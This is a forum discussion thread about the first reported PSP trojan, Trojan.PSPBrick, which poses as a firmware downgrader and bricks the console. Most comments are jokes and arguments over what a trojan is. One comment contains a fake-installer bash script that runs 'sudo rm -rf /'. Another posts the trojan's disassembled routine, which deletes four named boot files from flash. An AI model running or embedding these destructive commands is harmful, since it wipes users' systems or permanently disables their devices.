First PSP Trojan Reported

Evangelion writes "PSP hackers beware! According to 1up.com today, Symantec has identified the first PSP Trojan in the wild. Known as Trojan.PSPBrick, it turns the PSP into, well, a brick. With buttons. Users have to download and install it themselves, and as a result it effectively breaks the PSP."

Well then...

[PapaBoojum]

...I would recommend users NOT download it.

Re:Well then...

[RootsLINUX]

Wait, so I actually read TFA and I didn't see any details here. If the hack takes out user buttons, what's to stop it from taking out all other I/O? How do you remove a virus when you have no way to actually get your machine to interact with anything in the real world? The symantec report says removal is "difficult". What if someone accidentally downloads this virus, then isn't able to use their PSP anymore because they can't wipe the memory clean? Who is responsible then? Does Sony have to give them a brand new PSP? Do they have to physically open the device and set a jumper to clear the memory? I want to know the implications of the virus, not just "there's a virus, and it's bad".

Re:Well then...

[Paul+Slocum]

Read TOFA:
"Trojan.PSPBrick is a Trojan horse that deletes critical system files on a Playstation Portable device, preventing the device from restarting correctly."

That probably means that it's impossible to recover without debugging hardware.

-paul

Re:Well then...

[Joe+Random]

If the hack takes out user buttons,

It doesn't just take out the buttons; it flashes the firmware with junk, preventing the PSP from even booting.

What if someone accidentally downloads this virus, then isn't able to use their PSP anymore because they can't wipe the memory clean? Who is responsible then?

The user is, of course. The trojan is disguised as a firmware downgrader, and there's no way in hell that Sony is going to reimburse a person who was trying to "hack" their PSP. I'm pretty sure that there's something in the PSP boilerplate that covers that, but I'm too lazy to look.

Do they have to physically open the device and set a jumper to clear the memory?

There is no jumper. The memory has to be rewritten by an EEPROM programmer, which I doubt that any normal user is going to have access to. Sony won't send you a new PSP, and I don't doubt that, if anyone out there were able to reflash the PSP's firmware, Sony would be suing them under the DMCA or something.

In other words, this trojan turns your PSP into a $250 paperweight/brick, hence the name.

Re:Well then...

[Lehk228]

the trojan flashes firm junk? that's disgusting

Re:Well then...

[Xarius]

What if someone accidentally downloads this virus, then isn't able to use their PSP anymore because they can't wipe the memory clean?

All this will show is that (as usual) people have more money than sense. Don't fuck around with expensive gadgets unless you:

a) know what you are doing or
b) can afford to rectify/replace mistakes.

First trojan post

I, for one, welcome our new wooden horse overloards.

Who would be so silly...

[Zangief]

As to install a virus manually!

Hey, Microsoft just sent me a security update! Nifty!

Another prime example...

[Metal_Demon]

of how much people SUCK!

Re:Another prime example...

[Metal_Demon]

I'm just curious, is the person that modded me Troll suggesting that people who intentionally destroy other peoples property for fun don't suck? If so then I think YOU suck *nyah nyah nyah*!

Re:Another prime example...

[TetryonX]

Since "Annoying Emo" isn't a valid moderation, the modder had no choice but to choose their closest relative, the common Troll.

Both are annoying and unwanted, it is however uncommon for the average Annoying Emo to live under bridges and attack children as they try to cross the bridge.

Re:Another prime example...

But you didn't say that people who intentionally destroy other peoples property for fun suck. You said that all people suck. And you didn't do it in a particularly intelligent or insightful way. You added nothing to the conversation, and you did it in a way that could easily be seen as insulting to large groups of people. The mod was accurate, quit your whining.

Anyone notice....

[svtmunk]

That the Symantec page continues to instruct how to recover Windows XP? How useful... with that key info, I'll have my PS2 back up and running in no time!

Another misleading summary

[FrontalLobe]

They make it sound like you download something they advertise as a trojan. I RTFA, and its made out to be a program to let you run your own games.

Re:Another misleading summary

[Dark_Lord_Prime]

"They make it sound like you download something they advertise as a trojan. I RTFA, and its made out to be a program to let you run your own games."

Um... that's what a trojan is. A program masquerading as something it's not (such as a program to let you run your own games), to deliver the virus code.

Re:Another misleading summary

[Robmonster]

Well, of course!

It wouldn't be a trojan unless it were pretending to be something other than it was.....

:ugh2:

[paradigmdream]

why would someone want to do such a thing

Re::ugh2:

[PhotoBoy]

The tin foil hat community has theorised that Sony themselves wrote this virus as a way of scaring PSP owners into updating to the latest 2.01 firmware. The latest version prevents you from downgrading to firmware 1.5 and running emulators and other homebrew games. Because the latest firmware doesn't have a web browser or any other "must have" feature, they need something to spur people into updating...

Re::ugh2:

[default+luser]

But in REALITY, we know that there are white-hat, and black-hat hackers.

Once the community finds the vunerability, it is free game for the white-hats (firmware downgrader) and black-hats (firmware toaster). You should feel lucky that a remote exploit hasn't been found (yet).

Sony has provided a fix for the vunerability, because they have TWO significant financial interests. Most of you think there's only one (locking down the system to enforce licensing fees from developers), but there is another very serious one: keeping the system secure to avoid lost sales and a class-action lawsuit once users are left holding a bunch of hacked-up bricks.

Since the console is wireless, security is extrodinarily important.

Re::ugh2:

[Cheapy]

Probably for the same reasons someone would write a virus for Windows?

Simple solution to this one

[Daysaway]

"Users have to download and install it themselves"

Don't download and install it. It's not like they can creatively name an email attachment, and if it is turning PSP's into bricks, then you are not going to get it from another PSP.

Aside form all of that, it is interesting that there is already a virus out there at all for this handheld device. Although 'brick'ing a psp is just completely malicious, and has no effective purpose.

I give this virus a 2 out of 5 on the creative scale. (+1 for being the first)

Re:Simple solution to this one

[snuf23]

It's not a virus. It is a Trojan horse. A program which claims to be something beneficial but in reality just messes your computer up.

"Don't download and install it."

I'm sure if it's listed as "PSP Trojan Horse - turn your PSP into a useless brick" - nobody would download it.

Re:Simple solution to this one

[Dark_Lord_Prime]

As I mentioned in another post above, a Trojan Horse is a program that masquerades as something it isn't, in order to deliver malicious (read: virus) code, which then causes havoc.

Re:Simple solution to this one

[AvitarX]

Virus is usually to describe something that spreads (is contagous) and can be a benign (excpet the spreading part) proof of concept for example.

Trojan Horse must be malicious or detrimental, and does not spread at all.

Malicious is not read Virus, Malicious is Malicious, and Virus is Spreading.

Re:Simple solution to this one

[snuf23]

"in order to deliver malicious (read: virus) code"

malicious
adj.

Having the nature of or resulting from malice; deliberately harmful; spiteful: malicious gossip.

A Trojan horse just has to be harmful and deceptive, not deliver a virus. A batch file with rm -rf in it named "coolfungame" could be considered a Trojan horse.
Now if a virus infects a program file and executing the program causes the viral code to be executed, some people consider the infected file to have become a Trojan horse.

Re:Simple solution to this one

[rei1974]

Well this is really amusing! anyway I don't think anyone would download that file, or any other file, without knowing it comes from a safe source... with all trojan/virus/spywares around nowadays...!

free psps

[bigalsenior]

all we can do is wait for users to install it and us geeks can have free psps to hack. com on i mean how many people will install it eh. restoring wont be too hard . all you need is an image and eeprom writer

Sweet!

[theantipop]

I've been waiting for the upgraded version of my pet rock. "Pet Brick, now with buttons!".

Re:Sweet!

[fbjon]

..and a mouth! But you have to twist it to feed it.

Re:Sweet!

Even better, it's a Trojan brick... that city's been in ruins for millenia. You could sell it to a museum for quite a sum. :p

Warning: this is a joke

[Iriel]

Yeah, I heard about this. It was made by SONY and the file is called something like |\/|@d_1337_3|\/|ul873rz!.exe

thanks symantec!!!!

[B3AST!]

1. Disable System Restore (Windows Me/XP).
2. Update the virus definitions.
3. Run a full system scan and delete all the files detected.

wow...that should have your PSP working in no time

thanks for the help symantec *rolls eyes*

Re:thanks symantec!!!!

[macdaddy357]

Those generic info pages at Symantec suck, much like Norton's Virus, which virus writers and hackers expect to encounter and know how to disabe. Not that McViruscan is any better.

New Market

[jelloshotgun]

Does this mean that Symantec is going to begin marketing antivirus software for the PSP?

Re:New Market

[halleluja]

Does this mean that Symantec is going to begin marketing antivirus software for the PSP?

No way. Considering current Norton Antivirus deployments (PC), a PS1 would easily outperform Symantec-infected PSPs.

Is There Any Way to Avoid Getting This?

Now I'm really scared. Is there any way to avoid getting this virus? Any way at all?

And who would be so unethical as to pick on poor, defenseless PSP hackers? What is this world coming to?

PSafeP

[goodenoughnickname]

There is a program called PSafeP for Windows that claims to check EBOOT files for suspicious code. I have yet to verify its validity (my PSP is still collecting dust). Has anyone here checked it out?

(Sorry for linking to PSPUpdates, but it's the only place I've seen this.)

How is this a Trojan

[FidelCatsro]

It sounds like an Out and out classic virus .
Reminds Me of the Good old days when Viruses did real damage and were not company tools .

Re:How is this a Trojan

Go look up on what a trojan is before posting again

Re:How is this a Trojan

[SpottedKuh]

How is this a Trojan? Your answer:

"In computer security technology, a virus is a self-replicating program...", from http://en.wikipedia.org/wiki/Computer_Virus.

"In the context of computer software, a Trojan horse is a malicious program that is disguised as legitimate software.", from http://en.wikipedia.org/wiki/Trojan_horse_(computi ng).

In this case, the PSP malware is not self-replicating, and it is something you have to download and install on your own (which claims to let you run your own games on the PSP). Therefore, it is a Trojan rather than a virus. A destructive one, yes, but still just a Trojan.

Re:How is this a Trojan

[FidelCatsro]

Yes I see I made a mistake .. I had made the mistake of associated Trojan with back-doors in my mind .
Though it was a question (I did forget the ? though )

Re:How is this a Trojan

[FidelCatsro]

Cheers It appears that my head it stuck where the sun doesn't shine today .
(Normaly I would of double checked that)Though I imagine it is a common misconception so at least it helps clear that one up

Re:How is this a Trojan

Agreed, though you fail to see that it can't possibly be a trojan, as a trojan *protects* you from a virus.
You know absolutely nothing about security:
Wikipedia: Trojan

I, on the other hand, run Windows, because it's safer.

Social Engineering

[SpottedKuh]

I think this article makes a very important point, if only indirectly. There are two common ways of looking at the "virus situation" on non-Windows platforms, both of which are wrong.

One line of thought, perpetrated mostly by the Anti-Virus companies, is: "Of course there are viruses for [insert name of system they now have a product for]!" They love to scare people into thinking viruses are everywhere, and can get onto your system no matter how careful you are. Buy our product!

The other line of thought runs along the lines of: I run [OS X | Linux | BSD], therefore I cannot get malicious software on my system!

Unfortunately, too many people forget that anyone with the slightest bit of skill can write malicious software for any system, if they combine a bit of social engineering...

#!/bin/bash
echo Now type your password to install free screensavers!
sudo rm -rf /

That's exactly what this PSP malware is. Don't think of it as some crazy, rampant virus, because it isn't. It's just like the stupid bash script above. But just remember that, if you're going to install something as root, you better trust the source, no matter how secure (or, in the case of the PSP, obscure -- in that not much software is written for it) your OS is.

Re:Social Engineering

[squiggleslash]

Not sure what that program's supposed to do that's so bad. I got this when I ran it:

$ ./SpottedKuhTrojanExample
Now type your password to install free screensavers!
Password:
rm: -rf: No such file or directory
rm: /: is a directory
$

Is that what it's supposed to do?

On the downside, I didn't get any new free screensavers :-(

Re:Social Engineering

[SpottedKuh]

Not sure what that program's supposed to do that's so bad.

Bloody hell, I must have mistyped something in my example program. Let me try running it and see what happe...
[CARRIER LOST]

Father Jack's found a new pet.

[starakurva]

I love my brick!

Aaaaaaaaah feckit!

Fed up with briiiiiick!

Thats what you get when you use firmware

[diamondmagic]

They COULD have manufactured the firmware updater in the ROM, not flash/RAM/wherever. But no!

If there were a virus like this for the DS, it could totally spread like a virus. Imagine:
"Oh, COOL! I thought [game] wasn't out yet! I'll download it right away!"

Now imagine coupling this with some sort of wireless buffer-overflow exploit (that does not exist, as of yet). The horror!

Re:Thats what you get when you use firmware

[FLAGGR]

Bo. The first x (where x is some number) of bytes on the DS is write protected, and you have to manually short a connection to overwrite it.

Re:Thats what you get when you use firmware

[FLAGGR]

Damnit, replace Bo with No.

Re:Thats what you get when you use firmware

[Jonny_eh]

Now imagine coupling this with some sort of wireless buffer-overflow exploit (that does not exist, as of yet). The horror!

The DS only runs on its' wireless connectivity when the user requests it (you can see when it's on by looking at the blinking power LED). So I highly doubt that a wireless exploit could spread very far.

Removal Instructions

[Vampo]

From the Symantec page, simple instructions to remove the virus:

The following instructions pertain to all current and recent Symantec antivirus products, including the Symantec AntiVirus and Norton AntiVirus product lines.

      1. Disable System Restore (Windows Me/XP).
      2. Update the virus definitions.
      3. Run a full system scan and delete all the files detected.

thanks Symantec, nothing like a clean WinXP on my PSP again :)

Re:Removal Instructions

Do you think that, just maybe, the new XP virus defs might find the Trojan in the local drive of the computer system before moving it to the PSP?

Symantec is saying that they have figured out a signature for this little tool, and will seek it out, but it'll only be effective if you scan it before you use it. You know, what you should do doing now before you go running all the warez downloaded from BT or eMule.

Come on, people, think. They aren't telling you how to remove the problem. They are telling you how to protect against it.

Brought to you by...

[DaFork]

<announcer voice>
Trojan.PSPBrick... Brought to you by Nintendogs!
</announcer voice>

Wow!

[Kingrames]

I WONDERED how my dead pixels got cured...

Sony strikes back

[hal2814]

Wonder who wrote this trojan? Could it be a certain company that doesn't want you loading unauthorized software?

Re:Sony strikes back

[Viper168]

I would love to believe that, because I really hate Sony, but I don't think that's what's going on.

There have been hackers amongst the psp community who have joked about it, and made the information public titled exactly "How to brick your psp". There has been bad blood between a few groups, some of which I wouldn't put it past.

I love my psp, very sweet machine, but Sony still steams me.

Re:Sony strikes back

[wolfmanXUG]

Wonder who wrote this trojan? Could it be a certain company that doesn't want you loading unauthorized software? Careful do not want to give then too much credit.

Re:Sony strikes back

[llevity]

While I love conspiracies as much as the next guy, I don't think would really be to Sony's benefit. Don't they take a loss on all hardware sold, that they expect to recoup through software sales? If you brick your PSP, you're likely to just go out and buy another one. And a lot of types that do this kind of hacking aren't buying a lot of software anyway, so it would just cost Sony money.

Re:Sony strikes back

I hate Sony, but I still buy their products!

Guess what, Sony isn't getting your message.

Re:Sony strikes back

[Viper168]

Sony (at least the gaming division) isn't _quite_ bad enough in my eyes to outweigh the sweetness of the psp.

I of all people understand using my dollars to send a message, not shopping at Walmart, not buying RIAA backed music, and being vegan. I also support the homebrewn community, which according to Sony is terrible for them.

Ominous

[Teppy]

Though this trojan may be primitive, the fact that it permanently destroys* the PSP shows that PSPs are one buffer overflow away from an effective hardware destroying virus.

Imagine a place with a high concentration of WiFi-running PSPs, such as E3, GDC, etc. A virus makes a connection to another PSP, infects it remotely using said buffer overflow, does that a few times, and then 24 hours later kills it's host.

* Best I could tell, there's no way to remove it from the PSP. The "removal instructions" on Symantec's page appear to be for removing the file from the PC you downloaded it to.

How long...

until this gets ported to Linux?

Pandering to penguins

[Trails]

I've heard of this virus affecting other handheld devices, but under the name WindowsCE...

More to come in the future...

[michaelzhao]

With more and more devices being connected via the Internet. There will be a sufficent increase in worms and viruses that plague handhelds and other non-PC's. Think about how many other devices are connected to the Internet now. Cell-Phones, PSP's, XBOX's, PS2's, XBOX 360's, PS3's, Revolution's, etc. When these all are connected to the internet, users demand more functionality. With that, they get the darker side of the Internet. This PSP trojan is just the tip of the iceberg.
Lol, ironically, there is a PSP banner ad at the top my page.

Re:More to come in the future...

[iamhassi]

"This PSP trojan is just the tip of the iceberg. "

ummm... does anyone realize this is a GOOD thing?

Ok a trojan isnt a good thing, but the fact that PSPs have become soooo popular that there's people out there actually writing viruses for it?

I mean think about it, only the most popular consumer products have viruses. Windows? Tons. Mac? Basically none. Does that mean you can't have a Mac virus? Of course not, just means so few people have Macs that no one's out there bothering to make viruses for them. Cellphones? PocketPCs & other PDAs? Lots of those can access the internet and are user upgradeable, but how many viruses do they have for cellphones or PDAs?

I think this is just a sign that the PSP has finally arrived!

gee...

[KillShill]

i wonder who benefits the most from dead psp's...

it's not like the RIAA/MPAA hire goons to poison p2p networks...

oh wait...

Ahem

[Areeves]

Torrent? .....anyone? oh wait...

Deletes 4 firmware files

[quaker5567]

This is the disassembled code generated by Skylark from TOC2RTA.COM

As you can see, 4 files are deleted from the flash memory, then a few lines of text are displayed. Without these files, the PSP cannot boot, so it's bricked.

_start:
        call main()
        while(1)

sceIoAssign:
        syscall 0x20a8

sceIoRemove:
        syscall 0x209e

main:
        call FillVram(0)
        call Print(1,1,0xFFFFFF,"PSP TEAM 2.0 Exploit Hack the 2.0 firmware")
        call Print(1,2,0xFFFFFF,"Thank's to toc2rta for the 2.0 exploit :) ")
        call sceIoAssign("flash6:", "lflash0:0,0", "flashfat2:", 0, 0, 0)
        call sceIoRemove("flash6:/vsh/etc/index.dat")
        call sceIoRemove("flash6:/kd/loadcore.prx")
        call sceIoRemove("flash6:/kd/loadexec.prx")
        call sceIoRemove("flash6:/kd/init.prx")
        call Print(1,4,0xFFFFFF," Your 2.0 is hacked please reboot ")
        call Print(1,5,0xFFFFFF," Thank you PSP Team the french team")
        call Print(1,6,0xFFFFFF," FuCk yoshihiro and SonyxTeam Looser")

Nintendo DS

You can't flash the Nintendo DS without closing a jumper in the battery compartment. Who said Nintendo didn't know what they were doing?

Anti-hacked. . .

wouldn't it be possible to just put the files back on, assuming that you read the code and realize that you just installed the brick, before rebooting it?

releasing the "anti-hack" could possibly even lure our whoever is responsible. . .
eg, if sony were responsible (unlikely I know) but they would probably try to sue the anti-hack maker or something. . .

Post of the Week!

Post of the Week!

There's no support from SCEI

[Kusunose]

Accoding to impress (sorry, in Japanese), SCEI has no intention to provide support for users whose PSP are broken due to this trojan horse, saying this happens only when they are using their PSP in an (unsupported|illegitimate|unauthorative) way.

But I Was First! :/

[malelder]

Noone bothered to write me up a nice article when I introduced my Trojan.PSPThrowItAgainstTheWall hack :/ It made any PSP basically useless too.

How long till a exploite is found in the browser

[aka_big_wurm]

When and if a exploite is found in the PSP browser that lets you run code it will only be a matter of time for this to be used.

The only good thing about that is then sony would have to fix bricked PSP's.

I also herd something a while back that Team Xcuter was making a way to reflash PSP's

Torrent?

[Franklinstein]

Anybody have a .torrent?